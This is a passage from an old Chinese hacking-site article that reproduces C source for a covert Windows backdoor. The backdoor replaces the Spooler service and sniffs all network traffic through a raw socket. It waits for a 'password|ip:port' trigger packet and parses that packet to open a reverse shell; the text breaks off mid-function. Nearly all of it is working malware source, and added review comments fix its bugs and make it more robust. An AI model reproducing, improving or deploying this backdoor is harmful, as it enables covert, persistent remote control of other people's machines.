简单的无驱动嗅探启动后门
作者:未知    文章来源:CnXHacker.Net    点击数:    更新时间:2006-11-15    
SS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Unstall: Set key %s value error: %d\n", REPLACE_SERVICE_NAME, GetLastError() );
LogToFile( tmp );
#endif

return FALSE;
}

#ifdef DEBUG
LogToFile( "Unstall: write regedit successful\n" );
#endif

RegCloseKey(key);

return TRUE;
}

///////////////////////////////////////////////////////////////////////////////
// Service entry point: registers with the SCM, reports status, and runs the sniffer module
///////////////////////////////////////////////////////////////////////////////

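/*
 * Service entry point invoked by the SCM dispatcher. argc/argv carry the
 * service start parameters and are not used.
 *
 * Registers ServiceControl() as the control handler, reports RUNNING, then
 * runs Sniffer() in a loop until the control handler clears isRunning, and
 * finally reports STOPPED. If the handler cannot be registered or RUNNING
 * cannot be reported, start-up is abandoned without touching isRunning.
 *
 * Globals used (declared earlier in the file): serviceStatus,
 * hServiceStatus, isRunning, SERVICE_NAME.
 *
 * NOTE(review): isRunning is written by ServiceControl() on the SCM's
 * control-handler thread and polled here. Its declaration is outside this
 * listing — confirm it is volatile (or otherwise not cached across the loop).
 */
void ServiceMain( DWORD argc, char *argv[] )
{
	/* Sniffer() returns as soon as its socket fails. Without a pause the loop
	 * below would re-enter it back to back and pin a CPU core for as long as
	 * the error persists (for example when raw sockets are denied). */
	static const DWORD retryDelayMs = 1000;

	(void)argc;
	(void)argv;

	/* Single service in its own process; only STOP is advertised to the SCM. */
	serviceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
	serviceStatus.dwCurrentState = SERVICE_START_PENDING;
	serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
	serviceStatus.dwWin32ExitCode = 0;
	serviceStatus.dwServiceSpecificExitCode = 0;
	serviceStatus.dwCheckPoint = 0;
	serviceStatus.dwWaitHint = 0;

#ifdef DEBUG
	LogToFile( "ServiceMain: Try to register service\n" );
#endif

	hServiceStatus = RegisterServiceCtrlHandler( SERVICE_NAME, (LPHANDLER_FUNCTION)ServiceControl );
	if( hServiceStatus == (SERVICE_STATUS_HANDLE)0 )
	{
#ifdef DEBUG
		char tmp[256] = { 0 };
		/* GetLastError() returns a DWORD (unsigned long): %lu, not %d. */
		sprintf( tmp, "ServiceMain: Register service error: %lu\n", GetLastError() );
		LogToFile( tmp );
#endif
		return;
	}

	serviceStatus.dwCurrentState = SERVICE_RUNNING;
	serviceStatus.dwCheckPoint = 0;
	serviceStatus.dwWaitHint = 0;

#ifdef DEBUG
	LogToFile( "ServiceMain: Try to start service\n" );
#endif

	if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
	{
#ifdef DEBUG
		char tmp[256] = { 0 };
		sprintf( tmp, "ServiceMain: Start service error: %lu\n", GetLastError() );
		LogToFile( tmp );
#endif
		return;
	}

	isRunning = TRUE;

#ifdef DEBUG
	LogToFile( "ServiceMain: Service is running now\n" );
#endif

	/* Worker loop. Sniffer() blocks inside recv() and only returns when the
	 * stop flag is seen after a packet arrives, or when a socket call fails. */
	while( isRunning )
	{
#ifdef DEBUG
		LogToFile( "ServiceMain: Start sniffer now\n" );
#endif

		Sniffer( );

		/* Returned with the flag still set: Sniffer() gave up on an error,
		 * not on a stop request. Back off before trying again. */
		if( isRunning )
		{
			Sleep( retryDelayMs );
		}
	}

	serviceStatus.dwCurrentState = SERVICE_STOPPED;

	if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
	{
#ifdef DEBUG
		char tmp[256] = { 0 };
		sprintf( tmp, "ServiceMain: Stop service error: %lu\n", GetLastError() );
		LogToFile( tmp );
#endif
	}
}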

///////////////////////////////////////////////////////////////////////////////
// Service control handler: receives SCM requests (stop, pause, continue, interrogate)
///////////////////////////////////////////////////////////////////////////////

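/*
 * Control handler registered by ServiceMain(); runs on the SCM's
 * control-handler thread, not on the worker thread.
 *
 * request: one of the SERVICE_CONTROL_* codes. STOP sets STOP_PENDING and
 * clears isRunning so the worker loop in ServiceMain() can exit and report
 * SERVICE_STOPPED; PAUSE/CONTINUE only change the reported state (the
 * sniffer itself is not suspended, and neither control is advertised in
 * dwControlsAccepted); INTERROGATE and unknown codes just re-report the
 * current status.
 *
 * Every path ends with exactly one SetServiceStatus() call.
 */
void ServiceControl( DWORD request )
{
	/* How long the SCM should wait for SERVICE_STOPPED after STOP_PENDING.
	 * ServiceMain() only notices the cleared flag once Sniffer() returns from
	 * its blocking recv(), so a zero hint would be unrealistic. */
	static const DWORD stopWaitHintMs = 5000;

#ifdef DEBUG
	LogToFile( "ServiceControl: Into ServiceControl\n" );
#endif

	switch ( request )
	{
	case SERVICE_CONTROL_PAUSE:
		/* Reported only; the capture loop keeps running. */
		serviceStatus.dwCurrentState = SERVICE_PAUSED;
		break;

	case SERVICE_CONTROL_CONTINUE:
		serviceStatus.dwCurrentState = SERVICE_RUNNING;
		break;

	case SERVICE_CONTROL_STOP:
#ifdef DEBUG
		LogToFile( "ServiceControl: Try to stop service\n" );
#endif
		serviceStatus.dwWin32ExitCode = 0;
		serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
		serviceStatus.dwCheckPoint = 0;
		serviceStatus.dwWaitHint = stopWaitHintMs;

		/* Ask the worker to wind down; ServiceMain() reports SERVICE_STOPPED. */
		isRunning = FALSE;
		break;

	case SERVICE_CONTROL_INTERROGATE:
		/* Nothing to change; the status is re-reported below. */
		break;

	default:
#ifdef DEBUG
		LogToFile( "ServiceControl: Error arguments\n" );
#endif
		break;
	}

	if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
	{
#ifdef DEBUG
		char tmp[256] = { 0 };
		/* GetLastError() returns a DWORD (unsigned long): %lu, not %d. */
		sprintf( tmp, "ServiceControl: SetServiceStatus error: %lu\n", GetLastError() );
		LogToFile( tmp );
#endif
	}
}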

///////////////////////////////////////////////////////////////////////////////
// Debug-only file logger
///////////////////////////////////////////////////////////////////////////////

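#ifdef DEBUG
/*
 * Append one pre-formatted string to the debug log at DEBUG_LOG.
 *
 * str: NUL-terminated text; callers supply their own trailing "\n".
 *
 * Best effort: if the log cannot be opened the message is dropped instead of
 * calling fputs() on a NULL FILE*. Compiled only in DEBUG builds.
 *
 * NOTE(review): DEBUG_LOG is defined outside this listing. A service writing
 * to a fixed, predictable path can be abused for file planting or link
 * following if that directory is writable by less privileged users —
 * confirm the location before shipping a DEBUG build.
 */
void LogToFile( char *str )
{
	FILE *fp = fopen( DEBUG_LOG, "a" );

	if( fp == NULL )
	{
		return;
	}

	fputs( str, fp );
	fclose( fp );
}
#endif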

///////////////////////////////////////////////////////////////////////////////
// Command-line usage text
///////////////////////////////////////////////////////////////////////////////

/*
 * Print the usage text to stdout.
 *
 * prog: program name echoed in the usage line (callers pass argv[0]).
 */
void Help( char *prog )
{
	static const char *banner =
		"\n===================Code by 云舒(ph4nt0m.org)===================\n";
	static const char *hint =
		"after install,please restart the service which name is Spooler\n";

	fputs( banner, stdout );
	printf( "%s\t<-install>|<-unstall>\n", prog );
	fputs( hint, stdout );
}

///////////////////////////////////////////////////////////////////////////////
// Sniffer module: raw IPv4 socket in SIO_RCVALL mode, one datagram per recv()
///////////////////////////////////////////////////////////////////////////////

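/*
 * Non-zero when addr lies in one of the RFC 1918 private ranges
 * (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). addr is in network byte order.
 *
 * Replaces the original textual prefix tests on inet_ntoa() output, whose
 * "172." test treated the whole of 172.0.0.0/8 as private.
 */
static int IsPrivateIPv4( const struct in_addr *addr )
{
	unsigned long host = ntohl( addr->s_addr );

	return ( (host & 0xFF000000UL) == 0x0A000000UL ) ||   /* 10/8 */
	       ( (host & 0xFFF00000UL) == 0xAC100000UL ) ||   /* 172.16/12 */
	       ( (host & 0xFFFF0000UL) == 0xC0A80000UL );     /* 192.168/16 */
}

/*
 * Capture loop of the service. Opens a raw IPv4 socket bound to one local
 * address, switches it to SIO_RCVALL so every IP datagram the interface sees
 * is delivered to us (needs administrative rights and a socket bound to a
 * specific interface), and passes each datagram to DecodeTCP() until
 * isRunning is cleared or recv() fails.
 *
 * Returns 1 when the loop ended (stop request or recv() failure) and -1 when
 * Winsock start-up, name resolution, socket creation, bind() or the RCVALL
 * ioctl failed before any packet was read. Winsock is cleaned up on every
 * path that initialised it; the original leaked the WSAStartup() reference
 * on the resolution-failure path and never checked socket()/bind()/WSAIoctl().
 *
 * NOTE(review): isRunning is cleared from the SCM control-handler thread
 * while this thread sits in recv(); the stop is only noticed once a packet
 * arrives or recv() errors out. Its declaration is outside this listing —
 * confirm it is volatile (or otherwise not cached across the loop).
 */
int Sniffer( void )
{
	WSADATA wsaData;
	int startupError;
	char hostName[128] = { 0 };           /* local host name from gethostname() */
	struct hostent *phe;                  /* its address list from gethostbyname() */
	struct in_addr bindAddr;              /* address the raw socket is bound to */
	int haveBindAddr = 0;
	int ipIndex;
	SOCKET sock;
	SOCKADDR_IN sniff;
	DWORD dwBufferLen[10] = { 0 };        /* output area for WSAIoctl (unused) */
	DWORD dwBufferInLen = 1;              /* RCVALL_ON */
	DWORD dwBytesReturned = 0;
	char recvBuffer[BUFFER_SIZE] = { 0 }; /* one captured IP datagram */
	int bytesRecived;

	startupError = WSAStartup( MAKEWORD(2,2), &wsaData );
	if( startupError != 0 )
	{
#ifdef DEBUG
		char tmp[512] = { 0 };
		/* WSAStartup() returns the error code itself; GetLastError() is
		 * not meaningful here. */
		sprintf( tmp, "Sniffer: WSAStartup error: %d\n", startupError );
		LogToFile( tmp );
#endif
		return -1;
	}

	/* Resolve our own host name to enumerate the local IPv4 addresses. */
	if( gethostname( hostName, sizeof(hostName) ) == SOCKET_ERROR )
	{
#ifdef DEBUG
		char tmp[512] = { 0 };
		sprintf( tmp, "Sniffer: gethostname error: %d\n", WSAGetLastError() );
		LogToFile( tmp );
#endif
		WSACleanup( );
		return -1;
	}

	phe = gethostbyname( hostName );
	if( phe == NULL || phe->h_addr_list[0] == NULL )
	{
#ifdef DEBUG
		char tmp[512] = { 0 };
		sprintf( tmp, "Sniffer: GetHostName error: %d\n", WSAGetLastError() );
		LogToFile( tmp );
#endif
		WSACleanup( );
		return -1;
	}

	/* Prefer an address outside the RFC 1918 ranges; if the host has only
	 * private addresses, fall back to the first one in the list. */
	for( ipIndex = 0; phe->h_addr_list[ipIndex] != NULL; ipIndex++ )
	{
		struct in_addr candidate;

		memcpy( &candidate, phe->h_addr_list[ipIndex], sizeof(candidate) );
		if( !IsPrivateIPv4( &candidate ) )
		{
			bindAddr = candidate;
			haveBindAddr = 1;
			break;
		}
	}
	if( !haveBindAddr )
	{
		memcpy( &bindAddr, phe->h_addr_list[0], sizeof(bindAddr) );
	}

#ifdef DEBUG
	LogToFile( "Sniffer: Local IP is " );
	LogToFile( inet_ntoa( bindAddr ) );
	LogToFile( "\n" );
#endif

	/* Raw IP socket; with IPPROTO_IP the RCVALL mode delivers every protocol. */
	sock = socket( AF_INET, SOCK_RAW, IPPROTO_IP );
	if( sock == INVALID_SOCKET )
	{
#ifdef DEBUG
		char tmp[512] = { 0 };
		sprintf( tmp, "Sniffer: socket error: %d\n", WSAGetLastError() );
		LogToFile( tmp );
#endif
		WSACleanup( );
		return -1;
	}

#ifdef DEBUG
	LogToFile( "Sniffer: Sniffer socket is ok now...\n" );
#endif

	/* SIO_RCVALL requires the socket to be bound to a specific local address;
	 * port 0 lets the stack choose (irrelevant for raw capture). */
	memset( &sniff, 0, sizeof(sniff) );
	sniff.sin_family = AF_INET;
	sniff.sin_port = htons(0);
	sniff.sin_addr = bindAddr;

	if( bind( sock, (PSOCKADDR)&sniff, sizeof(sniff) ) == SOCKET_ERROR )
	{
#ifdef DEBUG
		char tmp[512] = { 0 };
		sprintf( tmp, "Sniffer: bind error: %d\n", WSAGetLastError() );
		LogToFile( tmp );
#endif
		closesocket( sock );
		WSACleanup( );
		return -1;
	}

#ifdef DEBUG
	LogToFile( "Sniffer: Sniffer bind is ok now...\n" );
#endif

	/* Switch the raw socket to receive-all (promiscuous at the IP layer). */
	if( WSAIoctl( sock, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen),
	              &dwBufferLen, sizeof(dwBufferLen), &dwBytesReturned, NULL, NULL ) == SOCKET_ERROR )
	{
#ifdef DEBUG
		char tmp[512] = { 0 };
		sprintf( tmp, "Sniffer: SIO_RCVALL error: %d\n", WSAGetLastError() );
		LogToFile( tmp );
#endif
		closesocket( sock );
		WSACleanup( );
		return -1;
	}

#ifdef DEBUG
	LogToFile( "Sniffer: Begain to recv...\n" );
#endif

	while( isRunning )
	{
		memset( recvBuffer, 0, sizeof(recvBuffer) );

		/* Read one byte less than the buffer so the final byte is always a
		 * NUL: DecodeTCP() receives no length and scans the payload as a C
		 * string, so a datagram that fills the buffer would otherwise let it
		 * read past recvBuffer. */
		bytesRecived = recv( sock, recvBuffer, sizeof(recvBuffer) - 1, 0 );
		if( bytesRecived <= 0 )
		{
#ifdef DEBUG
			LogToFile( "Sniffer: recv nothing,break...\n" );
#endif
			break;
		}

#ifdef DEBUG
		LogToFile( "Sniffer: recv ok,decode it...\n" );
#endif

		/* Datagrams shorter than the IP+TCP headers are padded with the
		 * zero-fill above; DecodeTCP() rejects them on the protocol field. */
		DecodeTCP( recvBuffer );
	}

	closesocket( sock );
	WSACleanup( );
	return 1;
}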

///////////////////////////////////////////////////////////////////////////////
// Packet parser: looks for the trigger string in captured TCP payload and starts the backdoor
///////////////////////////////////////////////////////////////////////////////

int DecodeTCP( char *buffer )
{
IP_HEADER *ipHeader;//IP_HEADER型指针
TCP_HEADER *tcpHeader;//TCP_HEADER型指针
struct in_addr inAddr;
char ourData[BUFFER_SIZE] = { 0 };
char *flag1 = NULL;
char *flag2 = NULL;
char password[64] = { 0 };
SHELL_ARGUMENT shellArgument;
HANDLE threadHandle = NULL;
DWORD threadID = 1;

ipHeader = (IP_HEADER *)buffer;

//是否TCP协议
if( ipHeader->proto != 6 )
{
return -1;
}

tcpHeader = (TCP_HEADER *)( buffer+sizeof(IP_HEADER) );

//是否有数据
if( buffer+sizeof(IP_HEADER)+sizeof(TCP_HEADER) == NULL )
{
return -1;
}

strncpy( ourData, buffer+sizeof(IP_HEADER) + sizeof(TCP_HEADER), BUFFER_SIZE - 2 );

flag1 = strchr( ourData, '|' );
flag2 = strchr( ourData, ':' );

//flag2-flag1为反向连接ip的长度,flag1 - ourData为密码长度
if( flag1 == NULL || flag2 == NULL ||
(flag2 - flag1) > sizeof(shellArgument.ip) || (flag1 - ourData) > (sizeof(password)-1)
)

{
return -1;
}

#ifdef DEBUG
LogToFile( "DecodeTCP: Have data...\n" );
LogToFile( "DecodeTCP: " );
LogToFile( ourData );
LogToFile( "\n\n" );
#endif

ZeroMemory( shellArgument.ip, sizeof(shellArgument.ip) );
ZeroMemory( shellArgument.port, sizeof(shellArgument.port) );

//获取密码
strncpy( password, ourData, flag1 - ourData );

//获取反连IP
strncpy( shellArgument.ip, flag1 + sizeof('|'), flag2-(flag1 + sizeof('|')) );

//获取端口
strncpy( shellArgument.port, flag2 + sizeof(':'), sizeof(shellArgument.port) - 1 );

//去掉port后面的回车字符
if( strchr( shellArgument.port, '\n' ) != NULL )
{
*strchr( shellArgument.port, '\n' ) = '';
}

#ifdef DEBUG
LogToFile( "DecodeTCP: password is " );
LogToFile( password );
LogToFile( "\nDecodeTCP: Remote ip
